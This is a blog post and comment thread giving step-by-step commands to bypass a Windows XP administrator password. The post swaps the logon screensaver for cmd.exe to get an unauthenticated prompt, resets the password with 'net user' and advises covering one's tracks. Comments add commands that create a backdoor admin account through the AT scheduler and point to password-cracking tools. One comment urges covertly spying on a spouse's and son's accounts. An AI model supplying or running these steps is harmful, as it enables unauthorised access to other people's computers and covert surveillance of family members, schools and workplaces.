How to Hack a Window XP Admins Password
This is a cool little computer trick for Microsoft Windows trick I’ve picked up in my travels and decided to share it with you fine and ethical individuals =). Log in and go to your DOS command prompt and enter these commands exactly:
cd\
cd\windows\system32
mkdir temphack
copy logon.scr temphack\logon.scr
copy cmd.exe temphack\cmd.exe
del logon.scr
rename cmd.exe logon.scr
exit
So what you just told windows to backup is the command program and the screen saver file. Then you edited the settings so when windows loads the screen saver, you will get an unprotected dos prompt without logging in. When this appears enter this command that’s in parenthesis (net user password). So if the admin user name is Doug and you want the password 1234 then you would enter “net user Doug 1234″ and now you’ve changed the admin password to 1234. Log in, do what you want to do, copy the contents of temphack back into system32 to cover your tracks.
Does putting the two files back restore the admin’s original password? Or will the admin not be able to log in afterwards?
hi guys…pls teach how to make windows xp not to log on after a month or two months…pls
pls send me all window xp codes
dude if you want answers to any computer question you have got to check this out he has downloads/serials/computer how to’s basicly everything check it out it amazing and FREE
http://mrcomputerguy.blogspot.com
pls give me detail i want to break the administrator’s password without opening any users.
thanks.
ok
jst three steps are there click start then on run there type control userpasswords2 ok then u will get administator block there reset password option is there ok there no need of old password is there hope to get u r reply soon on pappucha@gmail.com and one more thing type the pattern same a i had written
ok enjy u r self
Hey this doen’t work at my college comp… You must be in admin group to do this…
restart your computer when bios screen u need press F8
continue after that u press safe mode with networing
some notes going u wait a while. after that u that windows user will be show u click administor go to control panel click remove password after click password will me reset then u restart ur computer.
GO TO ADMINISTRATIVE TOOLS
IM THAT YOU HAVE LOCAL SECURITY POLICIES —> ACCOUNT POLICIES MAKE A SMALL RESEARCH THERE BECAUSE RIGHT NOW i’M IN LIMITED USER ACCOUNT LATER i MAY NOT CATCH UP YOU
watch this vid, it might solve your problems
http://www.metacafe.com/watch/376759/simple_way_on_how_to_hack_user_passwords_useful/
please post how to hack to administrator account for window xp sp2 again . please saravuthream@yahoo.com
thank in advance
dear sir.
how do hack administrator password.
My command prompt doesnt work anymore i keep getting an error that says windows can not find cmd. Check the name? Whats going on. I did all that above and now nothing works. Thanks.
*JoSh*
yo, you can go to run and type in command prompt hit enter and it should open it in a different way so that wont happen anymore
man the problem is your computer may have got a virus which first destroyed the cmd.exe file.so please first try to scan your computer with either updated F-Secure or Kaspersky new version
You can go to note pad or open windows internet explorer and right click and clikc source then when one of those is open type command.com then save the file as Anything You Want.bat then close ti and open it again for a command promt!
Install “avira” antivirus in ur system
hi guy I suppose you try eset antivirus it works miracles or mainatain your system with Iolo system mechanics
Open My Computer
Open Local Disk
Open Windows
Open System32
click on any file and start typing command
and then you should see it
after you open the file what ru supposed to do? start typing “command”?
Goto C: Drive
Windows
System32
And look for cmd and drag it to the desktop
This guy made such a fake name
dude just put cmd.exe. thats it
pls format the window or repair command.com file
My command prompt doesnt work anymore i keep getting an error that says windows can not find cmd. Check the name? Whats going on. I did all that above and now nothing works. Thanks for the help!
*JoSh*
type “command” if “cmd” doesn’t work.
also “command.com” or “cmd.com” one of those four should work.
if it doesnt work u can email me for help
(teecehunter@yahoo.com)
It’s because you renamed your cmd.exe to logon.scr, what you need to do is take cmd.exe and logon.scr out of the temphack folder you made and put them back into the system32 folder.
and how do u move ur temphack folder bak to ur system32 folder?
Hey but that does’nt work bcoz my administrator deny the access even to change the name of the file …or delete the file
Does putting the two files back restore the admin’s original password? Or will the admin not be able to log in afterwards?
not working.. access denied
not working… access denied
can’t chang password.. net user administrator * 
without login as power user 
:(
Dear…
you can chang only guest password but not admin ..for command net user..i will try also ..but not success.ok
sEND ME THE TRICK TO HACK ADMIN PASSWORD
Did you get the trick to hack into administrator password? I need it BAD! Lots of things going on at my house and hubby and son have everything blocked from me for the past month and half.
Check out loginrecovery.com, they have a software that you can burn onto a disk and run at boot up. It will not replace the password that they have installed, however - it will let you know what password they have in there so you can log on without them knowing. That way you can pull a Ninja and see what they see without them the wiser.
I hope this helps
Chris
wat is DOS
disk operating system…………….. buddy
um. Matt its Ur Disk operating system and you can get to it by going to your start menu and clicking “Run” and enter the code. cmd
no you idiot, DOS and Command prompt are two different things.
if you type in CMD (usually) it will open up the command prompt. if you type in command.com in run, it will open up MS-DOS.
Yes, they look the same. Yes they work the same. But they are different.
Okay somebody try their hand at this one my admin has put a software called busines lock on my PC it stops me getting to Run command and most of the programmes in My computer it is password protected how the hell do I turn it off???????
ooh my god guys every one check this out any question you have this guy will answer it AND if you need a download or serial for a program he has it. im telling you guys check this out.
http://mrcomputerguy.blogspot.com
yeah when i goto make a directory it tells me access denied i think this is because of my lack of admuin or is this aupposed to happen pleahs help
im in yr 7 and we have really good computers but its in classic version and it sucks. im really smart when it comes to computers but this one has me stuck. is there a simple way that i could change everything?
hi i was following the above steps and access was denied what do i do?
no the password will not be restored
It will
Yes, you are backing up theri login info, deleteing and making your own to get access. Puting the temphack files back is going to change restore the original information
uh.. no. First of all this is old. Second of all.. the original password WILL NOT be restored. Do you honestly think password hashes are stored in the command prompt executible or the screensaver????? Come on.. if you are going to give ‘hacking’ advice.. make sure you actually know what you’re talking about. So… where did you copy this info from?
Mike, no, restoring the files won’t restore the original password. The one you just created will still be in effect.
Quinn, you are just backing up the tools used to change the password. The “net password” actually changes the password in another part of the machine that you haven’t touched yourself.
No. You’re wrong. Once you change the local admin’s password, thats all she wrote. Unless you know his/her password already (so you can change it back), once you change it, it’s gone from the system.
Also, this breach won’t work if the system has NTFS as the file system, unless you have administrative rights, you won’t be able to delete logon.scr
This post is full of holes.
If you want to learn about /real/ hacking, check out Binary Revolution.
No it won’t. You are replacing the screensaver (logonlscr) with a command prompt (cmd.exe). Putting the files back just puts the screensaver back the way it was, but not changing any other settings back.
The downside to this is you still need to be able to log in to move the files around :\
a slightly shorter way of doing the same thing:
cd\
cd\windows\system32
mkdir temphack
move logon.scr temphack\logon.scr
copy cmd.exe logon.scr
exit
This do not work with XP with a domain
can not move or delete logon.scr
if you have a solution to erase the admin password of my HP portable, i would be a,lot gratefull to you
when i do this it says ”acces denied”.
Why don’t you just delete sam that is the easiest admin password hack.
logon.scr is a protected file, you need admin privs to delete it. IF you already have admin privs needed to do this, then you could just change the administrator password yourself.
So, this isn’t really a hack.
A hack that requires you to be logged into the machine to set up the hack isn’t a hack. If you’re already logged into the machine what do you need the hack for?
You are logged into the machine but not with administrative privileges. That’s what you need the hack for. And a brain, while you are at it.
I wrote a simpler way to do this a long time ago. If you have ANY admin access, you can just use the command to change any other user’s password without knowing it. This was all previously covered @
http://www.allthingsmarked.com/2006/08/21/change-your-xp-password-via-the-command-line/
I tried on computer in A+spec class with restricted access it doesn’t work when i tried to make directory temphack it says access denied HELP
try this http://ophcrack.sourceforge.net/. Works perfectly.
Brilliant! You just wiped the admins’s password and he’s going to be quite cross with you!
The two files you’ve copied DO NOT contain the Admin’s password which you can’t get that way.
You’d have to use something like the NTBACKUP and have it save the registry (System State). Restoring the registry, would of course wipe your hacked account.
You’re better off doing something like this instead:
net user i0wnU SkR1ptK!ddY /add
net localgroup Administrators i0wnU /add
This won’t add you to the domain, but will add you to the local machine.
Also, you’ll find that on a properly hardened system, you will not have permissions to overwrite the screensaver.
However, if you are allowed to run the windows scheduler via the AT command, you can schedule the above net commands to do the same thing without messing about with the screen saver. (Provided the scheduler runs as the SYSTEM or an Admin)
i.e.
AT 06:06 NET USER ….
AT 06:07 NET LOCALGROUP …
And Bob’s your uncle.
Cheers!
Wouldn’t you have to already have administrator privileges in order for this to work? I wouldn’t think a user that was only in the Users group would have permissions to overwrite those file on an NTFS filesystem. Perhaps the filesystem is FAT32?
Ever heard of ERD commander?…. that would be much easier if you can’t into the comp to begin with do to a lock out …
Hello I see that you had offered some advice to someone back in 2006 about my loERD commander i have the software. We’ll what my problem is. I have a hard drive that i am trying to access but it is protected with a bios password. How can i get around it with the locksmith or can you tell me what script i should be looking for in command line once opened in notepad so i can change the value of 0 or 1 i don’t want to overwrite the hard drive. Any feed back would be greatly appreciated.
Thanks in advance!!!
Normal system user does not have rights to copy, move , ren files in sys32. So useless useless you have rights to the C:.
This only works in Windows 2000 and prior. Does not work in XP/2003. You must have Admin rights to modify files/folders in %SYSTEMROOT%\System32 directory in XP/2003.
Anyway, once you have physical access to machine use: http://home.eunet.no/~pnordahl/ntpasswd/bootdisk.html
It’s a nice idea if you stick this on a USB stick and were scouring the school/office for unlocked, unattended PCs. As mentioned there are many better ways, but certainly this line would expose you straight away:
rename cmd.exe logon.scr
In effect you’ve moved cmd.exe meaning nobody on the machine can open a command prompt. Oops.
Nope. This does works on Windows XP (Most of the time). Some computers deny access while others do not. Luckily, our schools computers all have DeepFreeze so all I need to do to remove traces is to restart the computer.
Now, to turn this into a useful function quickly (lost admin password.. mistyped admin password, admin is AWOL) you could boot a nice Linux kernal, mount NTFS, and make the quick file change(s) that would then allow you to assign a new admin password.
I’ve never attempted to do this, but am going to file it away as a quick way to clean up a bad problem. I have had to pull a file from a PC and send it somewhere to have them hack the SAM file.
My XP-Pro is in a domain, and the Linux-life cd do not find the harddisk !
If you are logged in as an administrator the easiest way to change any password, including THE administrator, is simply to run ‘control userpasswords2′ (without quotes) from a command prompt, then change at will.
If I can’t even get into the beast as an administrator I use a linux bootdisk which allows me to reset any password. If there’s another way I’d be delighted to learn it here.
I tried many of the above options on my XP Pro version with Novell and yours worked great. I enter the ‘control userpasswords2′ command and was able to change the administrator password. Working for a school this is great for all the donated computers we get. Thank you!
Just restart the friggin machine and press f8 to log in under safe mode with networking. Then log in under the administrator whcih is usually passwordfree. Create you own username and then restart with admin privelages. Do whatever u want then restart with f8 safemode, go under administrator and delete the account u made!!!! wtf!!
or use this service– http://www.loginrecovery.com
This do not work with XP in a domain
if you have a better solution,
i wil be grateful to here about
actually there is a way to do this without logging in. you could use a windows 2000 installation disk and boot into the repair console to run the commands. while it is a windows 2000 disk, you can still use it to log into an xp installation. also a repair console from a windows xp disk will ask you for the administrator password whereas a win2k disk will not.
-cheers!